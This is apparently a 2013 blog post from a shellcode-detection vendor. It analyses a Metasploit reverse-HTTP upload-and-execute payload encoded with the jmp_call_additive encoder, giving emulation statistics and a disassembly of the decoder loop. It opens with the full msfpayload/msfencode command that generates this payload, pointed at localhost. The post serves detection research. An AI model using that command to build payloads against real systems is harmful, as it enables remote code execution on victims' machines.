Monday, March 18, 2013

Investigation result of windows/upexec/reverse_http encoded by x86/jmp_call_additive

======== Shellcode generation command ========
msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw
======== Payload investigation statistics ========
Suspicios payload offset: 0 Emulation attribute name Value ======================================================= WRITES_TO_PROCESS_STACK_MEMORY 1 ------------------------------------------------------- BUFFER_INSIDE_WRITES_COUNT 19 ------------------------------------------------------- REFERENCES_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- BUFFER_OUTSIDE_WRITES_COUNT 0 ------------------------------------------------------- FAR_JUMPS_COUNT 0 ------------------------------------------------------- FULLY_INITIALIZED_INSTRUCTIONS 100 ------------------------------------------------------- PROVIDED_ABSOLUTE_MEMORY_ADDRESSES 1 ------------------------------------------------------- PROC_CALLS_INSIDE_INV_BUFFER 1 ------------------------------------------------------- BUFFER_OUTSIDE_READS_COUNT 2 ------------------------------------------------------- UNDEFINED_DIRECT_CALLS 0 ------------------------------------------------------- JUMPS_INSIDE_INV_BUFFER 19 ------------------------------------------------------- CORRECTLY_PARSED_INSTRUCTIONS 100 ------------------------------------------------------- MEMORY_MODIFYING_MATH_INSTRUCTIONS 0 ------------------------------------------------------- BUFFER_INSIDE_READS_COUNT 19 ------------------------------------------------------- SYSTEM_CALLS_COUNT 0 ------------------------------------------------------- UNRECOGNIZED_CALL_TARGETS 0 ------------------------------------------------------- REFERENCES_TO_PROCESS_IMPORTS 0 ------------------------------------------------------- CORRECT_PROCEDURES_CALLS 0 ------------------------------------------------------- EIP_RETRIEVAL_INSTRUCTIONS 0 ------------------------------------------------------- JUMPS_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- EXECUTED_ARITHMETIC_INSTRUCTIONS 0 ------------------------------------------------------- CALLS_TARGETED_IMPORTS_SECTION 0 ------------------------------------------------------- UNRECOGNIZED_JUMP_TARGETS 0 ------------------------------------------------------- CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS 2 ------------------------------------------------------- REFERENCES_TO_PROCESS_EXPORTS 0 ------------------------------------------------------- EXECUTES_BITS_OPERATING_INSTRUCTIONS 0 ------------------------------------------------------- IMMEDIATE_OPERANDS_INSTRUCTIONS 0 ------------------------------------------------------- INDIRECT_BUFFER_REFERENCES 2 ------------------------------------------------------- MAX_WRITTEN_MEMORY_BLOCK 0 ------------------------------------------------------- CORRECTLY_EXECUTED_INSTRUCTIONS 100 ------------------------------------------------------- READS_FROM_PROCESS_STACK_MEMORY 1 ------------------------------------------------------- CALLS_TARGETED_EXPORTS_SECTION 0 ------------------------------------------------------- More about quttera investigation engine here


 ======== Detection disassembly ======== 

CLD                                          
MOV EBX (0x00000000),0x3E26957C              
JMP 0x0C                                    ;random read instruction
CALL 0xBFFCA744                              
POP ESI (0x00000000)                         
PUSH ESI (0xBFFCA755)                        
XOR DS:[ESI] (0xBFFCA755),EBX (0x3E26957C)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 1 0xBFFCA755
ADD EBX (0x3E26957C),EAX (0x0089E8FC)        
TEST EAX (0x0089E8FC),EAX (0x0089E8FC)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA759),EBX (0x3EB07E78)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 2 0xBFFCA759
ADD EBX (0x3EB07E78),EAX (0x89600000)        
TEST EAX (0x89600000),EAX (0x89600000)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA75D),EBX (0xC8107E78)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 3 0xBFFCA75D
ADD EBX (0xC8107E78),EAX (0x64D231E5)        
TEST EAX (0x64D231E5),EAX (0x64D231E5)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA761),EBX (0x2CE2B05D)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 4 0xBFFCA761
ADD EBX (0x2CE2B05D),EAX (0x8B30528B)        
TEST EAX (0x8B30528B),EAX (0x8B30528B)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA765),EBX (0xB81302E8)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 5 0xBFFCA765
ADD EBX (0xB81302E8),EAX (0x528B0C52)        
TEST EAX (0x528B0C52),EAX (0x528B0C52)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA769),EBX (0x0A9E0F3A)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 6 0xBFFCA769
ADD EBX (0x0A9E0F3A),EAX (0x28728B14)        
TEST EAX (0x28728B14),EAX (0x28728B14)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA76D),EBX (0x33109A4E)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 7 0xBFFCA76D
ADD EBX (0x33109A4E),EAX (0x264AB70F)        
TEST EAX (0x264AB70F),EAX (0x264AB70F)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA771),EBX (0x595B515D)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 8 0xBFFCA771
ADD EBX (0x595B515D),EAX (0xC031FF31)        
TEST EAX (0xC031FF31),EAX (0xC031FF31)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA775),EBX (0x198D508E)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 9 0xBFFCA775
ADD EBX (0x198D508E),EAX (0x7C613CAC)        
TEST EAX (0x7C613CAC),EAX (0x7C613CAC)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA779),EBX (0x95EE8D3A)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 10 0xBFFCA779
ADD EBX (0x95EE8D3A),EAX (0xC1202C02)        
TEST EAX (0xC1202C02),EAX (0xC1202C02)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA77D),EBX (0x570EB93C)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 11 0xBFFCA77D
ADD EBX (0x570EB93C),EAX (0xC7010DCF)        
TEST EAX (0xC7010DCF),EAX (0xC7010DCF)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA781),EBX (0x1E0FC70B)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 12 0xBFFCA781
ADD EBX (0x1E0FC70B),EAX (0x5752F0E2)        
TEST EAX (0x5752F0E2),EAX (0x5752F0E2)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA785),EBX (0x7562B7ED)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 13 0xBFFCA785
ADD EBX (0x7562B7ED),EAX (0x8B10528B)        
TEST EAX (0x8B10528B),EAX (0x8B10528B)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA789),EBX (0x00730A78)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 14 0xBFFCA789
ADD EBX (0x00730A78),EAX (0xD0013C42)        
TEST EAX (0xD0013C42),EAX (0xD0013C42)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA78D),EBX (0xD07446BA)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 15 0xBFFCA78D
ADD EBX (0xD07446BA),EAX (0x8578408B)        
TEST EAX (0x8578408B),EAX (0x8578408B)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA791),EBX (0x55EC8745)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 16 0xBFFCA791
ADD EBX (0x55EC8745),EAX (0x014A74C0)        
TEST EAX (0x014A74C0),EAX (0x014A74C0)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA795),EBX (0x5736FC05)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 17 0xBFFCA795
ADD EBX (0x5736FC05),EAX (0x488B50D0)        
TEST EAX (0x488B50D0),EAX (0x488B50D0)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA799),EBX (0x9FC24CD5)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 18 0xBFFCA799
ADD EBX (0x9FC24CD5),EAX (0x20588B18)        
TEST EAX (0x20588B18),EAX (0x20588B18)       
JNZ 0xF7                                    ;random read instruction
XOR DS:[ESI] (0xBFFCA79D),EBX (0xC01AD7ED)  ;investigation buffer write instruction
LODSD                                       ; investigation buffer read instruction 19 0xBFFCA79D
ADD EBX (0xC01AD7ED),EAX (0x3CE3D301)        
TEST EAX (0x3CE3D301),EAX (0x3CE3D301)